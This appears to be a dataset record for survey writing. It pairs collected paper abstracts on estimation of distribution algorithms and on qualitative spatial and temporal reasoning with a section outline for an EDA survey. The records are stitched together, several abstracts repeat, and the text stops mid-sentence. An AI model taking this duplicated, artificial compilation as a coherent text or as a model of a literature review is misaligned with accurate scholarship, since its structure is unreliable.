Applications of the Factorized Distribution Algorithm paper_content: The paper investigates the optimization of additively decomposable functions (ADF) by a new evolutionary algorithm called Factorized Distribution Algorithm (FDA). FDA is based on a factorization of the distribution to generate search points. First separable ADFs are considered. These are mapped to generalized linear functions with metavariables defined for multiple alleles. The mapping transforms FDA into an Univariate Marginal Frequency Algorithm (UMDA). For UMDA the exact equation for the response to selection is.computed under the assumption of proportionate selection. For truncation selection an approximate equation for the time to convergence is used, derived from an analysis of the OneMax function. FDA is also numerically investigated for non separable functions. The time to convergence is very similar to separable ADFs. FDA outpe1iorms the genetic algorithm with recombination of strings by far. --- paper_title: The gambler's ruin problem, genetic algorithms, and the sizing of populations paper_content: The paper presents a model for predicting the convergence quality of genetic algorithms. The model incorporates previous knowledge about decision making in genetic algorithms and the initial supply of building blocks in a novel way. The result is an equation that accurately predicts the quality of the solution found by a GA using a given population size. Adjustments for different selection intensities are considered and computational experiments demonstrate the effectiveness of the model. --- paper_title: On The Supply Of Building Blocks paper_content: This study addresses the issue of building-block supply in the initial population. Facetwise models for supply of a single building block as well as for supply of all schemata in a partition have been developed. An estimate for the population size required to ensure the presence of all raw building blocks has been derived using these facetwise models. The facetwise models and the population-sizing estimate are verified with computational results. --- paper_title: Population sizing for entropy-based model building in discrete estimation of distribution algorithms paper_content: This paper proposes a population-sizing model for entropy-based model building in discrete estimation of distribution algorithms. Specifically, the population size required for building an accurate model is investigated. The effect of selection pressure on population sizing is also preliminarily incorporated. The proposed model indicates that the population size required for building an accurate model scales as Θ(m log m), where m is the number of substructures of the given problem and is proportional to the problem size. Experiments are conducted to verify the derivations, and the results agree with the proposed model. --- paper_title: Genetic Algorithms, Noise, and the Sizing of Populations paper_content: This paper considers the effect of stochasticity on the quality of convergence of genetic algorithms (GAs). In many problems, the variance of building-block fitness or so-called collateral noise is the major source of variance, and a population-sizing equation is derived to ensure that average signal-to-collateral-noise ratios are favorable to the discrimination of the best building blocks required to solve a problem of bounded deception. The sizing relation is modified to permit the inclusion of other sources of stochasticity, such as the noise of selection, the noise of genetic operators, and the explicit noise or nondeterminism of the objective function. In a test suite of five functions, the sizing relation proves to be a conservative predictor of average correct convergence, as long as all major sources of noise are considered in the sizing calculation. These results suggest how the sizing equation may be viewed as a coarse delineation of a boundary between what a physicist might call two distinct phases of GA behavior. At low population sizes the GA makes many errors of decision, and the quality of convergence is largely left to the vagaries of chance or the serial fixup of flawed results through mutation or other serial injection of diversity. At large population sizes, GAs can reliably discriminate between good and bad building blocks, and parallel processing and recombination of building blocks lead to quick solution of even difficult deceptive problems. Additionally, the paper outlines a number of extensions to this work, including the development of more refined models of the relation between generational average error and ultimate convergence quality, the development of online methods for sizing populations via the estimation of populations via the estimation of population-sizing parameters, and the investigation of populationsizing in the context of niching and other schemes designed for use in problems with high cardinality solution sets. The paper also discusses how these results may one day lead to rigorous proofs of convergence for recombinative G As operating on problems of bounded description. --- paper_title: Scalability of the Bayesian optimization algorithm paper_content: To solve a wide range of different problems, the research in black-box optimization faces several important challenges. One of the most important challenges is the design of methods capable of automatic discovery and exploitation of problem regularities to ensure efficient and reliable search for the optimum. This paper discusses the Bayesian optimization algorithm (BOA), which uses Bayesian networks to model promising solutions and sample new candidate solutions. Using Bayesian networks in combination with population-based genetic and evolutionary search allows BOA to discover and exploit regularities in the form of a problem decomposition. The paper analyzes the applicability of the methods for learning Bayesian networks in the context of genetic and evolutionary search and concludes that the combination of the two approaches yields robust, efficient, and accurate search. --- paper_title: Enhancing the Performance of Maximum–Likelihood Gaussian EDAs Using Anticipated Mean Shift paper_content: Many Estimation---of---Distribution Algorithms use maximum-likelihood (ML) estimates. For discrete variables this has met with great success. For continuous variables the use of ML estimates for the normal distribution does not directly lead to successful optimization in most landscapes. It was previously found that an important reason for this is the premature shrinking of the variance at an exponential rate. Remedies were subsequently successfully formulated (i.e. Adaptive Variance Scaling (AVS) and Standard---Deviation Ratio triggering (SDR)). Here we focus on a second source of inefficiency that is not removed by existing remedies. We then provide a simple, but effective technique called Anticipated Mean Shift (AMS) that removes this inefficiency. --- paper_title: Drift and Scaling in Estimation of Distribution Algorithms paper_content: This paper considers a phenomenon in Estimation of Distribution Algorithms (EDA) analogous to drift in population genetic dynamics. Finite population sampling in selection results in fluctuations which get reinforced when the probability model is updated. As a consequence, any probability model which can generate only a single set of values with probability 1 can be an attractive fixed point of the algorithm. To avoid this, parameters of the algorithm must scale with the system size in strongly problemdependent ways, or the algorithm must be modified. This phenomenon is shown to hold for general EDAs as a consequence of the lack of ergodicity and irreducibility of the Markov chain on the state of probability models. It is illustrated in the case of UMDA, in which it is shown that the global optimum is only found if the population size is sufficiently large. For the needle-in-a haystack problem, the population size must scale as the square-root of the size of the search space. For the one-max problem, the population size must scale as the square-root of the problem size. --- paper_title: iBOA: The Incremental Bayesian Optimization Algorithm paper_content: This paper proposes the incremental Bayesian optimization algorithm (iBOA), which modifies standard BOA by removing the population of solutions and using incremental updates of the Bayesian network. iBOA is shown to be able to learn and exploit unrestricted Bayesian networks using incremental techniques for updating both the structure as well as the parameters of the probabilistic model. This represents an important step toward the design of competent incremental estimation of distribution algorithms that can solve difficult nearly decomposable problems scalably and reliably. --- paper_title: Space Complexity of Estimation of Distribution Algorithms paper_content: In this paper, we investigate the space complexity of the Estimation of Distribution Algorithms (EDAs), a class of sampling-based variants of the genetic algorithm. By analyzing the nature of EDAs, we identify criteria that characterize the space complexity of two typical implementation schemes of EDAs, the factorized distribution algorithm and Bayesian network-based algorithms. Using random additive functions as the prototype, we prove that the space complexity of the factorized distribution algorithm and Bayesian network-based algorithms is exponential in the problem size even if the optimization problem has a very sparse interaction structure. --- paper_title: Model Accuracy in the Bayesian Optimization Algorithm paper_content: Evolutionary algorithms (EAs) are particularly suited to solve problems for which there is not much information available. From this standpoint, estimation of distribution algorithms (EDAs), which guide the search by using probabilistic models of the population, have brought a new view to evolutionary computation. While solving a given problem with an EDA, the user has access to a set of models that reveal probabilistic dependencies between variables, an important source of information about the problem. However, as the complexity of the used models increases, the chance of overfitting and consequently reducing model interpretability, increases as well. This paper investigates the relationship between the probabilistic models learned by the Bayesian optimization algorithm (BOA) and the underlying problem structure. The purpose of the paper is threefold. First, model building in BOA is analyzed to understand how the problem structure is learned. Second, it is shown how the selection operator can lead to model overfitting in Bayesian EDAs. Third, the scoring metric that guides the search for an adequate model structure is modified to take into account the non-uniform distribution of the mating pool generated by tournament selection. Overall, this paper makes a contribution towards understanding and improving model accuracy in BOA, providing more interpretable models to assist efficiency enhancement techniques and human researchers. --- paper_title: Spurious dependencies and EDA scalability paper_content: Numerous studies have shown that advanced estimation of distribution algorithms (EDAs) often discover spurious (unnecessary) dependencies. Nonetheless, only little prior work exists that would study the effects of spurious dependencies on EDA performance. This paper examines the effects of spurious dependencies on the performance and scalability of EDAs with the main focus on EDAs with marginal product models and the onemax problem. A theoretical model is proposed to analyze the effects of spurious dependencies on the population sizing in EDAs and the theory is verified with experiments. The effects of spurious dependencies on the number of generations are studied empirically. The effects of replacement strategies on the performance of EDAs with spurious linkage are also investigated. --- paper_title: Analyzing Probabilistic Models in Hierarchical BOA paper_content: The hierarchical Bayesian optimization algorithm (hBOA) can solve nearly decomposable and hierarchical problems of bounded difficulty in a robust and scalable manner by building and sampling probabilistic models of promising solutions. This paper analyzes probabilistic models in hBOA on four important classes of test problems: concatenated traps, random additively decomposable problems, hierarchical traps and two-dimensional Ising spin glasses with periodic boundary conditions. We argue that although the probabilistic models in hBOA can encode complex probability distributions, analyzing these models is relatively straightforward and the results of such analyses may provide practitioners with useful information about their problems. The results show that the probabilistic models in hBOA closely correspond to the structure of the underlying optimization problem, the models do not change significantly in consequent iterations of BOA, and creating adequate probabilistic models by hand is not straightforward even with complete knowledge of the optimization problem. ---
Title: An Introduction and Survey of Estimation of Distribution Algorithms Section 1: Introduction Description 1: This section provides an overview of Estimation of Distribution Algorithms (EDAs) and their applications. Section 2: Estimation of Distribution Algorithms Description 2: This section explains the basic concepts of EDAs and how they work. Section 3: General EDA Procedure Description 3: This section outlines the general procedure for implementing EDAs, including algorithm steps and important concepts. Section 4: Solving Onemax with a Simple EDA Description 4: This section illustrates the basic EDA procedure using the onemax problem as an example. Section 5: EDA Overview Description 5: This section provides a broad overview of different types of EDAs, categorized by the type of distributions they encode. Section 6: Discrete Variables Description 6: This section covers EDAs that work on fixed-length strings of a finite cardinality, including different models that capture interactions between variables. Section 7: Permutation EDAs Description 7: This section discusses EDAs designed for problems where candidate solutions are represented by permutations, such as the traveling salesman problem. Section 8: Real-Valued Vectors Description 8: This section addresses EDAs applicable to optimization problems represented by real-valued vectors and their approaches, including direct representation. Section 9: EDA-GP Description 9: This section reviews EDAs designed for genetic programming (GP), focusing on challenges and successful implementations. Section 10: Multi-Objective EDAs Description 10: This section discusses EDAs developed for solving multi-objective optimization problems and methods for finding Pareto optimal solutions. Section 11: Related Algorithms Description 11: This section compares EDAs with other closely related stochastic optimization algorithms and techniques. Section 12: Advantages and Disadvantages of Using EDAs Description 12: This section reviews the main advantages and disadvantages of using EDAs compared to other metaheuristics. Section 13: Efficiency Enhancement Techniques for EDAs Description 13: This section outlines various techniques to enhance efficiency in EDAs, including parallelization, hybridization, and evaluation relaxation. Section 14: EDA Theory Description 14: This section covers theoretical aspects of EDAs, including convergence proofs, population sizing, diversity loss, memory complexity, and model accuracy. Section 15: Additional Information Description 15: This section provides pointers to additional sources of information on EDAs, including software, journals, and conferences. Section 16: Summary and Conclusions Description 16: This section summarizes the capabilities and strengths of EDAs and concludes with the potential of these algorithms in solving complex optimization problems.
A Survey of Qualitative Spatial and Temporal Calculi: Algebraic and Computational Properties
32
--- paper_title: A survey of qualitative spatial representations paper_content: Representation and reasoning with qualitative spatial relations is an important problem in artificial intelligence and has wide applications in the fields of geographic information system, computer vision, autonomous robot navigation, natural language understanding, spatial databases and so on. The reasons for this interest in using qualitative spatial relations include cognitive comprehensibility, efficiency and computational facility. This paper summarizes progress in qualitative spatial representation by describing key calculi representing different types of spatial relationships. The paper concludes with a discussion of current research and glimpse of future work. --- paper_title: Qualitative Spatial Reasoning with Cardinal Directions paper_content: Following reviews of previous approaches to spatial reasoning, a completely qualitative method for reasoning about cardinal directions, without recourse to analytical procedures, is introduced and a method is presented for a formal comparison with quantitative formulae. We use an algebraic method to formalize the meaning of cardinal directions. The standard directional symbols (N, S, E, W) are extended with a symbol 0 to denote an undecided case, which greatly increases the power of inference. Two examples of systems to determine and reason with cardinal directions are discussed in some detail and results from a prototype are given. The deduction rules for the coordination of directional symbols are formalized as equations; for inclusion in an expert system they can be coded as a look-up table (given in the text). The conclusions offer some direction for future work. --- paper_title: Reasoning about binary topological relations paper_content: A new formalism is presented to reason about topological relations. It is applicable as a foundation for an algebra over topological relations. The formalism is based upon the nine intersections of boundaries, interiors, and complements between two objects. Properties of topological relations are determined by analyzing the nine intersections to detect, for instance, symmetric topological relations and pairs of converse topological relations. Based upon the standard rules for the transitivity of set inclusion, the intersections of the composition of two binary topological relations are determined. These intersections are then matched with the intersections of the eight fundamental topological relations, giving an interpretation to the composition of topological relations. --- paper_title: Modeling Spatial Knowledge paper_content: A person's cognitive map, or knowledge of large-scale space, is built up from observations gathered as he travels through the environment. It acts as a problem solver to find routes and relative positions, as well as describing the current location. The TOUR model captures the multiple representations that make up the cognitive map, the problem-solving strategies it uses, and the mechanisms for assimilating new information. The representations have rich collections of states of partial knowledge, which support many of the performance characteristics of common-sense knowledge. --- paper_title: Qualitative spatial reasoning about distances and directions in geographic space paper_content: Abstract Most known methods for spatial reasoning translate a spatial problem into an analytical formulation in order to solve it quantitatively. This paper describes a method for formal, qualitative reasoning about distances and cardinal directions in geographic space. The problem addressed is how to deduce the distance and direction from point A to C, given the distance and direction from A to B and B to C. We use an algebraic approach, discussing the manipulation of distance and direction symbols (e.g. ‘N’, ‘E’, ‘S’ and ‘W’, or ‘Far’ and ‘Close’) and define two operations, composition and inverse , applied to them. After a review of other approaches, the desirable properties of deduction rules for distance and direction values are analyzed. This includes an algebraic specification of the ‘path’ image schema, from which most of the properties of distance and direction manipulation follow. Specific systems for composition of distance are explored. For directions, a formalization of the well-known triangular concept of directions (here called cone-shaped directions) and an alternative projection-based concept are explored. The algebraic approach leads to the completion of distance or direction symbols with an identity element, standing for the direction or distance from a point to itself. The so completed axiom system allows deductions, at least ‘Euclidean-approximate’, for any combination of input values. --- paper_title: The Psychological Validity of Qualitative Spatial Reasoning in One Dimension paper_content: One of the central questions of spatial reasoning research is whether the underlying processes are inherently visual, spatial, or logical. We applied the dual task interference paradigm to spatial reasoning problems in one dimension, using Allen's interval calculus, in order to make progress towards resolving this argument. Our results indicate that spatial reasoning with interval relations is largely based on the construction and inspection of qualitative spatial representations, or mental models, while no evidence for logical proofs of derivations or the involvement of visual representations and processes was found. --- paper_title: Current topics in qualitative reasoning paper_content: In this editorial introduction to this special issue of AI Magazine on qualitative reasoning, we briefly discuss the main motivations and characteristics of this branch of AI research. We also summarize the contributions in this issue and point out challenges for future research. --- paper_title: GIS, a computing perspective paper_content: INTRODUCTION What is a GIS? GIS Functionality Data and Databases Hardware Support FUNDAMENTAL DATABASE CONCEPTS Introduction to Databases Relational Databases Database Development Object-Orientation FUNDAMENTAL SPATIAL CONCEPTS Euclidean Space Set-Based Geometry of Space Topology of Space Network Spaces Metric Spaces Endnote on Fractal Geometry MODELS OF GEOSPATIAL INFORMATION Modeling and Ontology The Modeling Process Field-Based Models Object-Based Models REPRESENTATION AND ALGORITHMS Computing with Geospatial Data The Discrete Euclidean Plane The Spatial Object Domain Representations of Field-Based Models Fundamental Geometric Algorithms Vectorization and Rasterization Network Representation and Algorithms STRUCTURES AND ACCESS METHODS General Database Structures and Access Methods From One to Two Dimensions Raster Structures Point Object Structures Linear Objects Collections of Objects Spherical Data Structures ARCHITECTURES Hybrid, Integrated, and Composable Architectures Syntactic and Semantic Heterogeneity Distributed Systems Distributed Databases Location-Aware Computing INTERFACES Human-Computer Interaction Cartographic Interfaces Geovisualization Developing GIS Interfaces SPATIAL REASONING AND UNCERTAINTY Formal Aspects of Spatial Reasoning Information and Uncertainty Qualitative Approaches to Uncertainty Quantitative Approaches to Uncertainty Applications of Uncertainty in GIS TIME Introduction: A Brief History of Time Temporal Information Systems Spatiotemporal Information Systems Indexes and Queries Appendices --- paper_title: Exploiting qualitative spatial reasoning for topological adjustment of spatial data paper_content: Formal models of spatial relations such as the 9-Intersection model or RCC-8 have become omnipresent in the spatial information sciences and play an important role to formulate constraints in many applications of spatial data processing. A fundamental problem in such applications is to adapt geometric data to satisfy certain relational constraints while minimizing the changes that need to be made to the data. We address the problem of adjusting geometric objects to meet the spatial relations from a qualitative spatial calculus, forming a bridge between the areas of qualitative spatial representation and reasoning (QSR) and of geometric adjustment using optimization approaches. In particular, we explore how constraint-based QSR techniques can be beneficially employed to improve the optimization process. We discuss three different ways in which QSR can be utilized and then focus on its application to reduce the complexity of the optimization problem in terms of variables and equations needed. We propose two constraint-based problem simplification algorithms and evaluate them experimentally. Our results demonstrate that exploiting QSR techniques indeed leads to a significant performance improvement. --- paper_title: Qualitative spatial and temporal reasoning with AND/OR linear programming paper_content: This paper explores the use of generalized linear programming techniques to tackle two long-standing problems in qualitative spatio-temporal reasoning: Using LP as a unifying basis for reasoning, one can jointly reason about relations from different qualitative calculi. Also, concrete entities (fixed points, regions fixed in shape and/or position, etc.) can be mixed with free variables. Both features are important for applications but cannot be handled by existing techniques. In this paper we discuss properties of encoding constraint problems involving spatial and temporal relations. We advocate the use of AND/OR graphs to facilitate efficient reasoning and we show feasibility of our approach. --- paper_title: On Redundant Topological Constraints paper_content: The Region Connection Calculus (RCC) is a well-known calculus for representing part-whole and topological relations. It plays an important role in qualitative spatial reasoning, geographical information science, and ontology. The computational complexity of reasoning with RCC has been investigated in depth in the literature. Most of these works focus on the consistency of RCC constraint networks. In this paper, we consider the important problem of redundant RCC constraints. For a set Γ of RCC constraints, we say a constraint (x R y) in Γ is redundant if it can be entailed by the rest of Γ. A prime network of Γ is a subset of Γ which contains no redundant constraints but has the same solution set as Γ. It is natural to ask how to compute a prime network, and when it is unique. In this paper, we show that this problem is in general co-NP hard, but becomes tractable if Γ is over a tractable subclass of RCC. If S is a tractable subclass in which weak composition distributes over non-empty intersections, then we can show that Γ has a unique prime network, which is obtained by removing all redundant constraints from Γ. As a byproduct, we identify a sufficient condition for a path-consistent network being minimal. --- paper_title: On the Minimal Labeling Problem of Temporal and Spatial Qualitative Constraints paper_content: Spatial and temporal reasoning is a crucial task for certain Artificial Intelligence applications. In this context, and since two decades, various formalisms representing the information through qualitative constraint networks (QCN) have been proposed. Given a QCN, the main two problems that are facing researchers are: deciding whether this QCN is consistent or not, and, the minimal labeling problem. In this paper, we propose an efficient algorithm aiming at solving the minimal labeling problem. This algorithm is based on subclasses of relations for which the property of-consistency implies the minimality of the QCN. --- paper_title: Towards a declarative spatial reasoning system paper_content: We present early results on the development of a declarative spatial reasoning system within the context of the Constraint Logic Programming (CLP) framework. The system is capable of modelling and reasoning about qualitative spatial relations pertaining to multiple spatial domains, i.e., one or more aspects of space such as topology, and intrinsic and extrinsic orientation. It provides a seamless mechanism for combining formal qualitative spatial calculi within one framework, and provides a Prolog-based declarative interface for AI applications to abstract and reason about quantitative, geometric information in a qualitative manner. Based on previous work concerning the formalisation of the framework [2], we present ongoing work to develop the theoretical result into a comprehensive reasoning system (and Prolog-based library) which may be used independently, or as a logic-based module within hybrid intelligent systems. --- paper_title: Qualitative Spatial Representation and Reasoning with the Region Connection Calculus paper_content: This paper surveys the work of the qualitative spatial reasoning group at the University of Leeds. The group has developed a number of logical calculi for representing and reasoning with qualitative spatial relations over regions. We motivate the use of regions as the primary spatial entity and show how a rich language can be built up from surprisingly few primitives. This language can distinguish between convex and a variety of concave shapes and there is also an extension which handles regions with uncertain boundaries. We also present a variety of reasoning techniques, both for static and dynamic situations. A number of possible application areas are briefly mentioned. --- paper_title: Qualitative Spatial Reasoning about Sketch Maps paper_content: Sketch maps are an important spatial representation used in many geospatial-reasoning tasks. This article describes techniques we have developed that enable software to perform humanlike reasoning about sketch maps. We illustrate the utility of these techniques in the context of nuSketch Battlespace, a research system that has been successfully used in a variety of experiments. After an overview of the nuSketch approach and nuSketch Battlespace, we outline the representations of glyphs and sketches and the nuSketch spatial reasoning architecture. We describe the use of qualitative topology and Voronoi diagrams to construct spatial representations, and explain how these facilities are combined with analogical reasoning to provide a simple form of enemy intent hypothesis generation. --- paper_title: Realizing RCC8 networks using convex regions paper_content: RCC8 is a popular fragment of the region connection calculus, in which qualitative spatial relations between regions, such as adjacency, overlap and parthood, can be expressed. While RCC8 is essentially dimensionless, most current applications are confined to reasoning about two-dimensional or three-dimensional physical space. In this paper, however, we are mainly interested in conceptual spaces, which typically are high-dimensional Euclidean spaces in which the meaning of natural language concepts can be represented using convex regions. The aim of this paper is to analyze how the restriction to convex regions constrains the realizability of networks of RCC8 relations. First, we identify all ways in which the set of RCC8 base relations can be restricted to guarantee that consistent networks can be convexly realized in respectively 1D, 2D, 3D, and 4D. Most surprisingly, we find that if the relation 'partially overlaps' is disallowed, all consistent atomic RCC8 networks can be convexly realized in 4D. If instead refinements of the relation 'part of' are disallowed, all consistent atomic RCC8 relations can be convexly realized in 3D. We furthermore show, among others, that any consistent RCC8 network with 2n+1 variables can be realized using convex regions in the n-dimensional Euclidean space. --- paper_title: Qualitative Spatial Reasoning with Conceptual Neighborhoods for Agent Control paper_content: Research on qualitative spatial reasoning has produced a variety of calculi for reasoning about orientation or direction relations. Such qualitative abstractions are very helpful for agent control and communication between robots and humans. Conceptual neighborhood has been introduced as a means of describing possible changes of spatial relations which e.g. allows action planning at a high level of abstraction. We discuss how the concrete neighborhood structure depends on application-specific parameters and derive corresponding neighborhood structures for the $\mathcal{OPRA}_m$ calculus. We demonstrate that conceptual neighborhoods allow resolution of conflicting information by model-based relaxation of spatial constraints. In addition, we address the problem of automatically deriving neighborhood structures and show how this can be achieved if the relations of a calculus can be modeled in another calculus for which the neighborhood structure is known. --- paper_title: Formal Properties of Constraint Calculi for Qualitative Spatial Reasoning paper_content: In the previous two decades, a number of qualitative constraint calculi have been developed, which are used to represent and reason about spatial configurations. A common property of almost all of these calculi is that reasoning in them can be understood as solving a binary constraint satisfaction problem over infinite domains. The main algorithmic method that is used is constraint propagation in the form of the path-consistency method. This approach can be applied to a wide range of different aspects of spatial reasoning. We describe how to make use of this representation and reasoning technique and point out the possible problems one might encounter. 1 Qualitative Spatial Representation and Reasoning Representing spatial information and reasoning about this information is an important subproblem in many applications, such as geographical information systems (GIS), natural language understanding, robot navigation, and document interpretation. Often this information is only available qualitatively, for instance when a GIS query or integrity condition has to be specified (Sharma et al., 1994). Similarly, in document interpretation, the precise size and location of layout objects is not of interest, but the relative position of these objects matters (Walischewski, 1999). A number of approaches to representing qualitative spatial information and reasoning about it are possible. A very early attempt at qualitative spatial representation and reasoning is Kuipers’ (1978) TOUR model, which addresses the navigation problem using qualitative descriptions. Other approaches aim, for instance, to capture spatial notions using first-order logic (Randell and Cohn, 1989; --- paper_title: What is a Qualitative Calculus ? A General Framework paper_content: What is a qualitative calculus? Many qualitative spatial and temporal calculi arise from a set of JEPD (jointly exhaustive and pairwise disjoint) relations: a stock example is Allen's calculus, which is based on thirteen basic relations between intervals on the time line. This paper examines the construction of such a formalism from a general point of view, in order to make apparent the formal algebraic properties of all formalisms of that type. We show that the natural algebraic object governing this kind of calculus is a non-associative algebra (in the sense of Maddux), and that the notion of weak representation is the right notion for describing most basic properties. We discuss the ubiquity of weak representations in various guises, and argue that the fundamental notion of consistency itself can best be understood in terms of consistency of one weak representation with respect to another. --- paper_title: What is a Qualitative Calculus ? A General Framework paper_content: What is a qualitative calculus? Many qualitative spatial and temporal calculi arise from a set of JEPD (jointly exhaustive and pairwise disjoint) relations: a stock example is Allen's calculus, which is based on thirteen basic relations between intervals on the time line. This paper examines the construction of such a formalism from a general point of view, in order to make apparent the formal algebraic properties of all formalisms of that type. We show that the natural algebraic object governing this kind of calculus is a non-associative algebra (in the sense of Maddux), and that the notion of weak representation is the right notion for describing most basic properties. We discuss the ubiquity of weak representations in various guises, and argue that the fundamental notion of consistency itself can best be understood in terms of consistency of one weak representation with respect to another. --- paper_title: What is a Qualitative Calculus ? A General Framework paper_content: What is a qualitative calculus? Many qualitative spatial and temporal calculi arise from a set of JEPD (jointly exhaustive and pairwise disjoint) relations: a stock example is Allen's calculus, which is based on thirteen basic relations between intervals on the time line. This paper examines the construction of such a formalism from a general point of view, in order to make apparent the formal algebraic properties of all formalisms of that type. We show that the natural algebraic object governing this kind of calculus is a non-associative algebra (in the sense of Maddux), and that the notion of weak representation is the right notion for describing most basic properties. We discuss the ubiquity of weak representations in various guises, and argue that the fundamental notion of consistency itself can best be understood in terms of consistency of one weak representation with respect to another. --- paper_title: The finest of its class: The natural point-based ternary calculus for qualitative spatial reasoning paper_content: In this paper, a ternary qualitative calculus ${\mathcal LR}$ for spatial reasoning is presented that distinguishes between left and right. A theory is outlined for ternary point-based calculi in which all the relations are invariant when all points are mapped by rotations, scalings, or translations (RST relations). For this purpose, we develop methods to determine arbitrary transformations and compositions of RST relations. We pose two criteria which we call practical and natural. ‘Practical' means that the relation system should be closed under transformations, compositions and intersections and have a finite base that is jointly exhaustive and pairwise disjoint. This implies that the well-known path consistency algorithm [10] can be used to conclude implicit knowledge. ‘Natural' calculi are close to our natural way of thinking because the base relations and their complements are connected. The main result of the paper is the identification of a maximally refined calculus amongst the practical natural RST calculi, which turns out to be very similar to Ligozat's flip-flop calculus. From that it follows, e.g., that there is no finite refinement of the TPCC calculus by Moratz et al that is closed under transformations, composition, and intersection. --- paper_title: On the utilization of spatial structures for cognitively plausible and efficient reasoning paper_content: The authors present an approach to representing and processing qualitative orientation information which is motivated by cognitive considerations about the knowledge acquisition process. The approach to qualitative spatial reasoning is based on directional orientation information as available through perceptual processes. qualitative orientations in two-dimensional space are given by the relation between a point and a vector. A basic iconic notation for spatial orientation relations which exploits the spatial structure of the domain is presented, and a variety of ways in which these relations can be manipulated and combined for spatial reasoning is explored. > --- paper_title: Formal Properties of Constraint Calculi for Qualitative Spatial Reasoning paper_content: In the previous two decades, a number of qualitative constraint calculi have been developed, which are used to represent and reason about spatial configurations. A common property of almost all of these calculi is that reasoning in them can be understood as solving a binary constraint satisfaction problem over infinite domains. The main algorithmic method that is used is constraint propagation in the form of the path-consistency method. This approach can be applied to a wide range of different aspects of spatial reasoning. We describe how to make use of this representation and reasoning technique and point out the possible problems one might encounter. 1 Qualitative Spatial Representation and Reasoning Representing spatial information and reasoning about this information is an important subproblem in many applications, such as geographical information systems (GIS), natural language understanding, robot navigation, and document interpretation. Often this information is only available qualitatively, for instance when a GIS query or integrity condition has to be specified (Sharma et al., 1994). Similarly, in document interpretation, the precise size and location of layout objects is not of interest, but the relative position of these objects matters (Walischewski, 1999). A number of approaches to representing qualitative spatial information and reasoning about it are possible. A very early attempt at qualitative spatial representation and reasoning is Kuipers’ (1978) TOUR model, which addresses the navigation problem using qualitative descriptions. Other approaches aim, for instance, to capture spatial notions using first-order logic (Randell and Cohn, 1989; --- paper_title: What is a Qualitative Calculus ? A General Framework paper_content: What is a qualitative calculus? Many qualitative spatial and temporal calculi arise from a set of JEPD (jointly exhaustive and pairwise disjoint) relations: a stock example is Allen's calculus, which is based on thirteen basic relations between intervals on the time line. This paper examines the construction of such a formalism from a general point of view, in order to make apparent the formal algebraic properties of all formalisms of that type. We show that the natural algebraic object governing this kind of calculus is a non-associative algebra (in the sense of Maddux), and that the notion of weak representation is the right notion for describing most basic properties. We discuss the ubiquity of weak representations in various guises, and argue that the fundamental notion of consistency itself can best be understood in terms of consistency of one weak representation with respect to another. --- paper_title: A new approach to cyclic ordering of 2D orientations using ternary relation algebras paper_content: Abstract In Tarski's formalisation, the universe of a relation algebra (RA) consists of a set of binary relations. A first contribution of this work is the introduction of RAs whose universe is a set of ternary relations: these support rotation as an operation in addition to those present in Tarski's formalisation. Then we propose two particular RAs: a binary RA, CYC b , whose universe is a set of (binary) relations on 2D orientations; and a ternary RA, CYC t , whose universe is a set of (ternary) relations on 2D orientations. The RA CYC t , more expressive than CYC b , constitutes a new approach to cyclic ordering of 2D orientations. An atom of CYC t expresses for triples of orientations whether each of the three orientations is equal to, to the left of, opposite to, or to the right of each of the other two orientations. CYC t has 24 atoms and the elements of its universe consist of all possible 2 24 subsets of the set of all atoms. Amongst other results, 1. we provide for CYC t a constraint propagation procedure computing the closure of a problem under the different operations, and show that the procedure is polynomial, and complete for a subset including all atoms; 2. we prove that another subset, expressing only information on parallel orientations, is NP-complete; 3. we show that provided that a subset S of CYC t includes two specific elements, deciding consistency for a problem expressed in the closure of S can be polynomially reduced to deciding consistency for a problem expressed in S ; and 4. we derive from the previous result that for both RAs we “jump” from tractability to intractability if we add the universal relation to the set of all atoms. A comparison to the most closely related work in the literature indicates that the approach is promising. --- paper_title: The finest of its class: The natural point-based ternary calculus for qualitative spatial reasoning paper_content: In this paper, a ternary qualitative calculus ${\mathcal LR}$ for spatial reasoning is presented that distinguishes between left and right. A theory is outlined for ternary point-based calculi in which all the relations are invariant when all points are mapped by rotations, scalings, or translations (RST relations). For this purpose, we develop methods to determine arbitrary transformations and compositions of RST relations. We pose two criteria which we call practical and natural. ‘Practical' means that the relation system should be closed under transformations, compositions and intersections and have a finite base that is jointly exhaustive and pairwise disjoint. This implies that the well-known path consistency algorithm [10] can be used to conclude implicit knowledge. ‘Natural' calculi are close to our natural way of thinking because the base relations and their complements are connected. The main result of the paper is the identification of a maximally refined calculus amongst the practical natural RST calculi, which turns out to be very similar to Ligozat's flip-flop calculus. From that it follows, e.g., that there is no finite refinement of the TPCC calculus by Moratz et al that is closed under transformations, composition, and intersection. --- paper_title: On the consistency of cardinal directions constraints paper_content: We present a formal model for qualitative spatial reasoning with cardinal directions utilizing a co-ordinate system. Then, we study the problem of checking the consistency of a set of cardinal direction constraints. We introduce the first algorithm for this problem, prove its correctness and analyze its computational complexity. Utilizing the above algorithm, we prove that the consistency checking of a set of basic (i.e., non-disjunctive) cardinal direction constraints can be performed in O(n^5) time. We also show that the consistency checking of a set of unrestricted (i.e., disjunctive and non-disjunctive) cardinal direction constraints is NP-complete. Finally, we briefly discuss an extension to the basic model and outline an algorithm for the consistency checking problem of this extension. --- paper_title: Using Orientation Information for Qualitative Spatial Reasoning paper_content: A new approach to representing qualitative spatial knowledge and to spatial reasoning is presented. This approach is motivated by cognitive considerations and is based on relative orientation information about spatial environments. The approach aims at exploiting properties of physical space which surface when the spatial knowledge is structured according to conceptual neighborhood of spatial relations. The paper introduces the notion of conceptual neighborhood and its relevance for qualitative temporal reasoning. The extension of the benefits to spatial reasoning is suggested. Several approaches to qualitative spatial reasoning are briefly reviewed. Differences between the temporal and the spatial domain are outlined. A way of transferring a qualitative temporal reasoning method to the spatial domain is proposed. The resulting neighborhood-oriented representation and reasoning approach is presented and illustrated. An example for an application of the approach is discussed. --- paper_title: On the Scope of Qualitative Constraint Calculi paper_content: A central notion in qualitative spatial and temporal reasoning is the concept of qualitative constraint calculus, which captures a particular paradigm of representing and reasoning about spatial and temporal knowledge. The concept, informally used in the research community for a long time, was formally defined by Ligozat and Renz in 2004 as a special kind of relation algebra — thus emphasizing a particular type of reasoning about binary constraints. Although the concept is known to be limited it has prevailed in the community. In this paper we revisit the concept, contrast it with alternative approaches, and analyze general properties. Our results indicate that the concept of qualitative constraint calculus is both too narrow and too general: it disallows different approaches, but its setup already enables arbitrarily hard problems. --- paper_title: On the utilization of spatial structures for cognitively plausible and efficient reasoning paper_content: The authors present an approach to representing and processing qualitative orientation information which is motivated by cognitive considerations about the knowledge acquisition process. The approach 